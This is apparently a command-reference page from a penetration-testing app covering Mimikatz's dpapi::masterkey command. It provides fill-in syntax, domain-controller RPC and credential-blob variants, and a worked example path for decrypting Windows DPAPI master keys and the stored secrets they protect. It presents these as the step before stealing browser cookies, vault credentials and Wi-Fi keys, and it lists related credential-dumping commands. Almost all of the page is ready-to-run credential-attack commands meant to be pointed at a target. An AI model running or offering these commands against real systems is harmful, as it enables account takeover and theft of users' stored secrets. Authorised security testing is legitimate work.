Mimikatz dpapi::masterkey
Decrypt a DPAPI master key using the owner's plaintext password (or NT hash). Required step before decrypting Chrome/Edge cookies, vault credentials, and Wi-Fi PSKs. Use /rpc on a DC for trustee decryption without the password.
- Tool
- mimikatz.exe
- Category
- Credential Attacks / Hash Dumping
- Platform
- windows
- Requires
- shell access
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
mimikatz.exe "dpapi::masterkey /in:<masterkey-file> /sid:<user-sid> /password:<user-password>" exit
Credential variants
The same attack using a different authentication material.
DC RPC Decrypt (DA) requires shell access
mimikatz.exe "dpapi::masterkey /in:<masterkey-file> /rpc" exit
Decrypt Credential Blob requires shell access
mimikatz.exe "dpapi::cred /in:<credential-file> /masterkey:<decrypted-mk>" exit
Examples
mimikatz.exe "dpapi::masterkey /in:C:\Users\jdoe\AppData\Roaming\Microsoft\Protect\<sid>\<guid> /sid:S-1-5-21-... /password:Password123!" exit
Tags
Related commands
- Impacket DPAPI Masterkey Decrypt DPAPI masterkey using user password to derive DPAPI encryption key
- Impacket Secrets Dump Dump hashes from remote Windows system (SAM, LSA, NTDS)
- Impacket Targeted DCSync (Single User) DCSync only one specific account instead of replicating the whole NTDS. Massively…
- Lsassy LSASS Dump Remotely dump LSASS credentials using lsassy
- Mimikatz Credential Dump Extract plaintext passwords and hashes from all available sources
- Mimikatz lsadump::dcsync Pull a single user's NT hash and Kerberos keys directly from a DC via the MS-DRSR…
- Mimikatz lsadump::sam Extract local SAM hashes (built-in Administrator, local users) from a live Windows host.…
- Mimikatz sekurlsa::logonpasswords Dump credentials (NT hashes, Kerberos keys, plaintext where wdigest is enabled, MSV1_0)…